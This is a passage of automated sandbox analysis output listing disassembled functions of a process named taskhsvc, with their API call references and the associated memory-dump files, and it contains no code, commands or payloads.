      • Part of subcall function 00325CFA: free.MSVCRT ref: 00325FB5
      • Part of subcall function 00325CFA: free.MSVCRT ref: 00325FDD
      • Part of subcall function 00325CFA: free.MSVCRT ref: 00325FFF
      • Part of subcall function 00325CFA: __stack_chk_fail.LIBSSP-0 ref: 0032601B
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00315B2B, Relevance: 4.7, APIs: 3, Instructions: 223
    APIs
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 00315895: strlen.MSVCRT ref: 003158CA
      • Part of subcall function 00315895: __stack_chk_fail.LIBSSP-0 ref: 00315904
    • CreateFileA.KERNEL32 ref: 00315BEF
      • Part of subcall function 0031928D: FormatMessageA.KERNELBASE ref: 003192E4
      • Part of subcall function 0031928D: __stack_chk_fail.LIBSSP-0 ref: 0031933D
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • free.MSVCRT ref: 00315E9E
      • Part of subcall function 00315F38: free.MSVCRT ref: 00315FE2
      • Part of subcall function 00315F38: __stack_chk_fail.LIBSSP-0 ref: 00315FFE
    • __stack_chk_fail.LIBSSP-0 ref: 00315F2B
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002BF2B8, Relevance: 4.7, APIs: 3, Instructions: 218
    APIs
      • Part of subcall function 00321355: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213C1
      • Part of subcall function 00321355: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213E7
    • memset.MSVCRT ref: 002BF3B3
      • Part of subcall function 0032174B: free.MSVCRT ref: 00321775
      • Part of subcall function 0032174B: __stack_chk_fail.LIBSSP-0 ref: 0032178D
    • memset.MSVCRT ref: 002BF4BA
    • __stack_chk_fail.LIBSSP-0(?), ref: 002BF590
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0031D513, Relevance: 4.7, APIs: 3, Instructions: 218
    APIs
      • Part of subcall function 00321355: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213C1
      • Part of subcall function 00321355: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213E7
    • memset.MSVCRT ref: 0031D60E
      • Part of subcall function 0032174B: free.MSVCRT ref: 00321775
      • Part of subcall function 0032174B: __stack_chk_fail.LIBSSP-0 ref: 0032178D
    • memset.MSVCRT ref: 0031D715
    • __stack_chk_fail.LIBSSP-0(?), ref: 0031D7EB
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0031DEF4, Relevance: 4.7, APIs: 3, Instructions: 218
    APIs
      • Part of subcall function 00321355: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213C1
      • Part of subcall function 00321355: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00319CF8), ref: 003213E7
    • memset.MSVCRT ref: 0031DFEF
      • Part of subcall function 0032174B: free.MSVCRT ref: 00321775
      • Part of subcall function 0032174B: __stack_chk_fail.LIBSSP-0 ref: 0032178D
    • memset.MSVCRT ref: 0031E0F6
    • __stack_chk_fail.LIBSSP-0(?), ref: 0031E1CC
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0032EE71, Relevance: 4.7, APIs: 3, Instructions: 183
    APIs
      • Part of subcall function 0032E7FD: __stack_chk_fail.LIBSSP-0 ref: 0032E852
      • Part of subcall function 0032D3C2: abort.MSVCRT ref: 0032D412
      • Part of subcall function 0032D3C2: __stack_chk_fail.LIBSSP-0 ref: 0032D507
    • free.MSVCRT ref: 0032EF2B
      • Part of subcall function 0032E859: __stack_chk_fail.LIBSSP-0 ref: 0032E8DD
      • Part of subcall function 0031AA40: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,002526E7), ref: 0031AA97
      • Part of subcall function 0031AA40: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,002526E7), ref: 0031AAD5
      • Part of subcall function 0031AA40: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,002526E7), ref: 0031AB19
      • Part of subcall function 0031AA40: memmove.MSVCRT ref: 0031AB70
      • Part of subcall function 0031AA40: __stack_chk_fail.LIBSSP-0 ref: 0031AB97
    • free.MSVCRT ref: 0032EF9C
    • __stack_chk_fail.LIBSSP-0 ref: 0032F10C
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 0032E8E4: memset.MSVCRT ref: 0032E941
      • Part of subcall function 0032E8E4: memset.MSVCRT ref: 0032E95F
      • Part of subcall function 0032E8E4: memset.MSVCRT ref: 0032EC7C
      • Part of subcall function 0032E8E4: __stack_chk_fail.LIBSSP-0 ref: 0032EC92
      • Part of subcall function 0032158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 003215E4
      • Part of subcall function 0032158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 00321623
      • Part of subcall function 0032158B: memcpy.MSVCRT ref: 0032164A
      • Part of subcall function 0032158B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 0032165D
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 0032BEDA: abort.MSVCRT ref: 0032BF43
      • Part of subcall function 0032BEDA: abort.MSVCRT ref: 0032BFE0
      • Part of subcall function 0032BEDA: __stack_chk_fail.LIBSSP-0 ref: 0032C220
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0024353A, Relevance: 4.6, APIs: 3, Instructions: 142
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 0024374A
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 0031F679: abort.MSVCRT ref: 0031F6C9
      • Part of subcall function 0031F679: __stack_chk_fail.LIBSSP-0 ref: 0031F6E4
      • Part of subcall function 0031FA10: __stack_chk_fail.LIBSSP-0 ref: 0031FA3B
      • Part of subcall function 0031F8C2: abort.MSVCRT ref: 0031F91E
      • Part of subcall function 0031F8C2: abort.MSVCRT ref: 0031F960
      • Part of subcall function 0031F8C2: abort.MSVCRT ref: 0031F99F
      • Part of subcall function 0031F8C2: abort.MSVCRT ref: 0031F9DE
      • Part of subcall function 0031F8C2: __stack_chk_fail.LIBSSP-0 ref: 0031FA09
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 0031F6EB: abort.MSVCRT ref: 0031F741
      • Part of subcall function 0031F6EB: abort.MSVCRT ref: 0031F780
      • Part of subcall function 0031F6EB: __stack_chk_fail.LIBSSP-0 ref: 0031F7A2
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 00231AED: abort.MSVCRT ref: 00231B56
      • Part of subcall function 00231AED: abort.MSVCRT ref: 00231B99
      • Part of subcall function 00231AED: abort.MSVCRT ref: 00231BE6
